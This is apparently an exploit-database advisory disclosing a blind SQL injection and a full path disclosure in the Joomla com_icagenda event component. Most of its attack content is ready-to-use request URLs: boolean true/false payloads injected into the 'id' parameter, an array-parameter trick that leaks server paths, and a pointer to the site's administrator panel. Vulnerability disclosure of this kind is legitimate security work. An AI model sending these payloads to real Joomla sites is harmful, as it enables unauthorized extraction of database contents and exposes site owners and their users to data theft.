43 lines
No EOL
1.8 KiB
Text
43 lines
No EOL
1.8 KiB
Text
# Souhail Hammou - Independant Security Researcher & Penetration Tester .
|
|
# Facebook : www.facebook.com/dark.puzzle.sec
|
|
# E-mail : dark-puzzle@live.fr
|
|
# Greetings to all moroccan researchers and white hats .
|
|
------------------------------------------------------------------------------
|
|
# Exploit Title: Joomla Component (com_icagenda) Multiple Vulnerabilities .
|
|
# Author: Dark-Puzzle (Souhail Hammou)
|
|
# Risk : Critical
|
|
# Version: All Versions
|
|
# Google Dork : N/A
|
|
# Category: Webapps
|
|
# Tested on: Windows Xp Sp2 Fr .
|
|
# OSVDB ID : 85147 and 85148 .
|
|
# OSVDB Links : http://osvdb.org/show/osvdb/85148 & http://osvdb.org/show/osvdb/85147
|
|
***************************************************************************************
|
|
Info :
|
|
|
|
Icagenda is a New Component for Event Management with a calendar module.
|
|
----------------------------------------------------
|
|
I - Blind SQL Injection Vulnerability
|
|
----------------------------------------------------
|
|
|
|
Vulnerability :
|
|
|
|
"id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of True and False Queries through SQL statements .
|
|
Here the invisible content shows us that the target suffers from Blind SQL Injection Vulnerability .
|
|
|
|
Example :
|
|
|
|
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
|
|
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)
|
|
|
|
|
|
ADMIN PANEL : http://target/administrator
|
|
|
|
-----------------------------------------------------
|
|
II - Full Path Disclosure Vulnerability
|
|
-----------------------------------------------------
|
|
The Full path can be retrieved using Array method [] in ItemID & id Parameters .
|
|
|
|
Example :
|
|
|
|
http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 |